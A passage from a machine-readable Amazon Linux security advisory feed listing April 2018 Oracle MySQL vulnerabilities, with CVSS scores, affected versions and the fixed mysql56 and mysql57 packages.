Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.7.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1568940:
CVE-2018-2779 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2018)
CVE-2018-2778:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.7.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1568938:
CVE-2018-2778 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2018)
CVE-2018-2777:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.7.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1568937:
CVE-2018-2777 mysql: InnoDB unspecified vulnerability (CPU Apr 2018)
CVE-2018-2776:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Group Replication GCS). Supported versions that are affected are 5.7.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via XCom to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1568936:
CVE-2018-2776 mysql: Group Replication GCS unspecified vulnerability (CPU Apr 2018)
CVE-2018-2775:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.7.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1568934:
CVE-2018-2775 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2018)
CVE-2018-2773:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Client programs). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where MySQL Server executes to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.1 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).
1568932:
CVE-2018-2773 mysql: Client programs unspecified vulnerability (CPU Apr 2018)
CVE-2018-2771:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Locking). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).
1568931:
CVE-2018-2771 mysql: Server: Locking unspecified vulnerability (CPU Apr 2018)
CVE-2018-2769:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Pluggable Auth). Supported versions that are affected are 5.7.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1568927:
CVE-2018-2769 mysql: Server: Pluggable Auth unspecified vulnerability (CPU Apr 2018)
CVE-2018-2766:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1568926:
CVE-2018-2766 mysql: InnoDB unspecified vulnerability (CPU Apr 2018)
CVE-2018-2762:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Connection). Supported versions that are affected are 5.7.21 and prior. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where MySQL Server executes to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1568925:
CVE-2018-2762 mysql: Server: Connection unspecified vulnerability (CPU Apr 2018)
CVE-2018-2761:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Client programs). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 5.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H).
1568924:
CVE-2018-2761 mysql: Client programs unspecified vulnerability (CPU Apr 2018)
CVE-2018-2759:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.7.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1568923:
CVE-2018-2759 mysql: InnoDB unspecified vulnerability (CPU Apr 2018)
CVE-2018-2758:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server : Security : Privileges). Supported versions that are affected are 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1568922:
CVE-2018-2758 mysql: Server: Security: Privileges unspecified vulnerability (CPU Apr 2018)
CVE-2018-2755:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Replication). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Difficult to exploit vulnerability allows unauthenticated attacker with logon to the infrastructure where MySQL Server executes to compromise MySQL Server. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in MySQL Server, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of MySQL Server. CVSS 3.0 Base Score 7.7 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H).
1568921:
CVE-2018-2755 mysql: Server: Replication unspecified vulnerability (CPU Apr 2018)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2755" title="" id="CVE-2018-2755" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2758" title="" id="CVE-2018-2758" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2759" title="" id="CVE-2018-2759" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2761" title="" id="CVE-2018-2761" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2762" title="" id="CVE-2018-2762" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2766" title="" id="CVE-2018-2766" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2769" title="" id="CVE-2018-2769" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2771" title="" id="CVE-2018-2771" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2773" title="" id="CVE-2018-2773" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2775" title="" id="CVE-2018-2775" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2776" title="" id="CVE-2018-2776" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2777" title="" id="CVE-2018-2777" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2778" title="" id="CVE-2018-2778" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2779" title="" id="CVE-2018-2779" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2780" title="" id="CVE-2018-2780" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2781" title="" id="CVE-2018-2781" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2782" title="" id="CVE-2018-2782" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2784" title="" id="CVE-2018-2784" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2786" title="" id="CVE-2018-2786" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2787" title="" id="CVE-2018-2787" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2810" title="" id="CVE-2018-2810" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2812" title="" id="CVE-2018-2812" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2813" title="" id="CVE-2018-2813" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2816" title="" id="CVE-2018-2816" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2817" title="" id="CVE-2018-2817" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2818" title="" id="CVE-2018-2818" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2819" title="" id="CVE-2018-2819" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2839" title="" id="CVE-2018-2839" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2846" title="" id="CVE-2018-2846" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql57-server" version="5.7.22" release="2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-server-5.7.22-2.7.amzn1.x86_64.rpm</filename></package><package name="mysql57-common" version="5.7.22" release="2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-common-5.7.22-2.7.amzn1.x86_64.rpm</filename></package><package name="mysql57" 
version="5.7.22" release="2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-5.7.22-2.7.amzn1.x86_64.rpm</filename></package><package name="mysql57-devel" version="5.7.22" release="2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-devel-5.7.22-2.7.amzn1.x86_64.rpm</filename></package><package name="mysql57-test" version="5.7.22" release="2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-test-5.7.22-2.7.amzn1.x86_64.rpm</filename></package><package name="mysql57-errmsg" version="5.7.22" release="2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-errmsg-5.7.22-2.7.amzn1.x86_64.rpm</filename></package><package name="mysql57-embedded" version="5.7.22" release="2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-5.7.22-2.7.amzn1.x86_64.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.22" release="2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-debuginfo-5.7.22-2.7.amzn1.x86_64.rpm</filename></package><package name="mysql57-libs" version="5.7.22" release="2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-libs-5.7.22-2.7.amzn1.x86_64.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.22" release="2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-devel-5.7.22-2.7.amzn1.x86_64.rpm</filename></package><package name="mysql57-server" version="5.7.22" release="2.7.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-server-5.7.22-2.7.amzn1.i686.rpm</filename></package><package name="mysql57-common" version="5.7.22" release="2.7.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-common-5.7.22-2.7.amzn1.i686.rpm</filename></package><package name="mysql57-libs" version="5.7.22" release="2.7.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-libs-5.7.22-2.7.amzn1.i686.rpm</filename></package><package name="mysql57-test" version="5.7.22" release="2.7.amzn1" epoch="0" 
arch="i686"><filename>Packages/mysql57-test-5.7.22-2.7.amzn1.i686.rpm</filename></package><package name="mysql57" version="5.7.22" release="2.7.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-5.7.22-2.7.amzn1.i686.rpm</filename></package><package name="mysql57-devel" version="5.7.22" release="2.7.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-devel-5.7.22-2.7.amzn1.i686.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.22" release="2.7.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-debuginfo-5.7.22-2.7.amzn1.i686.rpm</filename></package><package name="mysql57-errmsg" version="5.7.22" release="2.7.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-errmsg-5.7.22-2.7.amzn1.i686.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.22" release="2.7.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-devel-5.7.22-2.7.amzn1.i686.rpm</filename></package><package name="mysql57-embedded" version="5.7.22" release="2.7.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-5.7.22-2.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1027</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1027: medium priority package update for mysql56</title><issued date="2018-05-25 18:26:00" /><updated date="2018-05-29 23:13:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-2819:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1568956:
CVE-2018-2819 mysql: InnoDB unspecified vulnerability (CPU Apr 2018)
CVE-2018-2818:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server : Security : Privileges). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1568955:
CVE-2018-2818 mysql: Server : Security : Privileges unspecified vulnerability (CPU Apr 2018)
CVE-2018-2817:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DDL). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1568954:
CVE-2018-2817 mysql: Server: DDL unspecified vulnerability (CPU Apr 2018)
CVE-2018-2813:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DDL). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of MySQL Server accessible data. CVSS 3.0 Base Score 4.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N).
1568951:
CVE-2018-2813 mysql: Server: DDL unspecified vulnerability (CPU Apr 2018)
CVE-2018-2787:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 5.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H).
1568946:
CVE-2018-2787 mysql: InnoDB unspecified vulnerability (CPU Apr 2018)
CVE-2018-2784:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1568944:
CVE-2018-2784 mysql: InnoDB unspecified vulnerability (CPU Apr 2018)
CVE-2018-2782:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1568943:
CVE-2018-2782 mysql: InnoDB unspecified vulnerability (CPU Apr 2018)
CVE-2018-2781:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1568942:
CVE-2018-2781 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2018)
CVE-2018-2773:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Client programs). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where MySQL Server executes to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.1 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).
1568932:
CVE-2018-2773 mysql: Client programs unspecified vulnerability (CPU Apr 2018)
CVE-2018-2771:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Locking). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).
1568931:
CVE-2018-2771 mysql: Server: Locking unspecified vulnerability (CPU Apr 2018)
CVE-2018-2766:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1568926:
CVE-2018-2766 mysql: InnoDB unspecified vulnerability (CPU Apr 2018)
CVE-2018-2761:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Client programs). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 5.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H).
1568924:
CVE-2018-2761 mysql: Client programs unspecified vulnerability (CPU Apr 2018)
CVE-2018-2758:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server : Security : Privileges). Supported versions that are affected are 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1568922:
CVE-2018-2758 mysql: Server: Security: Privileges unspecified vulnerability (CPU Apr 2018)
CVE-2018-2755:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Replication). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Difficult to exploit vulnerability allows unauthenticated attacker with logon to the infrastructure where MySQL Server executes to compromise MySQL Server. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in MySQL Server, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of MySQL Server. CVSS 3.0 Base Score 7.7 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H).
1568921:
CVE-2018-2755 mysql: Server: Replication unspecified vulnerability (CPU Apr 2018)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2755" title="" id="CVE-2018-2755" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2758" title="" id="CVE-2018-2758" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2761" title="" id="CVE-2018-2761" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2766" title="" id="CVE-2018-2766" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2771" title="" id="CVE-2018-2771" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2773" title="" id="CVE-2018-2773" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2781" title="" id="CVE-2018-2781" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2782" title="" id="CVE-2018-2782" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2784" title="" id="CVE-2018-2784" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2787" title="" id="CVE-2018-2787" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2813" title="" id="CVE-2018-2813" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2817" title="" id="CVE-2018-2817" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2818" title="" id="CVE-2018-2818" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2819" title="" id="CVE-2018-2819" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql56" version="5.6.40" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-5.6.40-1.29.amzn1.x86_64.rpm</filename></package><package name="mysql56-libs" version="5.6.40" 
release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-libs-5.6.40-1.29.amzn1.x86_64.rpm</filename></package><package name="mysql56-test" version="5.6.40" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-test-5.6.40-1.29.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.40" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-devel-5.6.40-1.29.amzn1.x86_64.rpm</filename></package><package name="mysql56-bench" version="5.6.40" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-bench-5.6.40-1.29.amzn1.x86_64.rpm</filename></package><package name="mysql56-common" version="5.6.40" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-common-5.6.40-1.29.amzn1.x86_64.rpm</filename></package><package name="mysql56-errmsg" version="5.6.40" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-errmsg-5.6.40-1.29.amzn1.x86_64.rpm</filename></package><package name="mysql56-server" version="5.6.40" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-server-5.6.40-1.29.amzn1.x86_64.rpm</filename></package><package name="mysql56-devel" version="5.6.40" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-devel-5.6.40-1.29.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded" version="5.6.40" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-5.6.40-1.29.amzn1.x86_64.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.40" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-debuginfo-5.6.40-1.29.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.40" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-devel-5.6.40-1.29.amzn1.i686.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.40" release="1.29.amzn1" epoch="0" 
